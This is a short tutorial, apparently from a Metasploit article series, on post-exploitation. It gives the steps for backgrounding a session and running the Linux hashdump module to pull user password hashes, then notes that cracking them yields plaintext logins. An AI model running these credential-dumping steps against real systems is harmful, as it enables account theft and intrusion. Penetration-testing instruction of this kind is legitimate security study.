Ill have to admit- we have been skipping a few details during exploitation. While using the exploits, we can also set payloads. Think of payloads as an extra set of tools that you go in with that will help you do more stuff. We will show you how to use payloads in later articles.
Post exploitation is the next step after breaking into the target machine. Lets look at a post exploitation example where we will dump all the password hashes of users on the target system.
Get an open session
Follow any of our previous exploitation articles to help you get an open session with the target machine.
Hit ctrl+Z to put the session into background. Enter Y when prompted.
With this command, the session is still open however it is put on the background so as to allow you to use msfconsole.
You can have multiple open sessions in the background.
Check your sessions using the command: sessions
Enter the command: use post/linux/gather/hashdump
Enter the command: show options
This command selects the hashdump script. Metasploit stores all its post exploitation scripts in the "post" folder. We will go through other scripts in later articles.
Normally we set the RHOST on exploits to give them a target. However on post exploitation scripts in metasploit we give it a session.
Enter the command: set SESSION 1
The "1" in the command simple corresponds to the 'session 'id' you want the script to run on. You can view your sessions by the "sessions" command shown above.
What you see on your screen are passwords... in hash format. Hashed passwords are then cracked using password cracking techniques or tools to retrieve plain text passwords which we can then use on login fields.
-Jayesh Kerai (@secjay)